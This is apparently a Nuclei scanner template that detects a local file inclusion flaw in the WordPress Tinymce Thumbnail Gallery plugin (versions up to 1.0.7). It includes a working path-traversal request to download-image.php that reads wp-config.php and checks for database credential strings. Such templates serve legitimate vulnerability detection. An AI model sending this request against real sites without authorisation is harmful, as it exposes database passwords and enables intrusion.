id: wp-tinymce-lfi info: name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion author: 0x_Akoko severity: high description: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php. reference: - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: wpscan,wordpress,wp-theme,lfi,tinymce http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4b0a00483046022100ec86d9a7051ad39eba3e07b1a98b2e2fdf808c25f71437f4bc99ac1c3c96c31d022100eaad8c43440427d763d121d9a2080b640ca879b0c6f5b974d931b58182fd79cd:922c64590222798bb761d5b6d8e72950